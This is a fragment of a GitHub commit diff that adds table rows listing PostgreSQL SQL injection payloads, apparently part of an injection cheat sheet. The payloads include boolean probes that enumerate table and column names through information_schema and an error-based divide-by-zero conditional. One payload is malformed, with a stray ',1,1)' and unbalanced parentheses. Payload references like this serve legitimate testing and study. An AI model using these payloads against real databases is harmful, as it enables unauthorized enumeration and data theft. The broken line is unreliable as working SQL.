You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
<td>AND (SELECT table_name::text FROM information_schema.tables LIMIT 1) LIKE '%'</td>
36
+
</tr>
37
+
<tr>
38
+
<td>AND (SELECT table_name::text FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND table_schema NOT LIKE 'pg_toast%' AND table_type = 'BASE TABLE' LIMIT 1) LIKE '%'</td>
39
+
</tr>
40
+
<tr>
41
+
<td>AND (SELECT row_to_json(t)::text FROM (SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME' LIMIT 1) t),1,1) LIKE '%'</td>
42
+
</tr>
43
+
<tr>
44
+
<td>AND 1 = (SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END)</td>
0 commit comments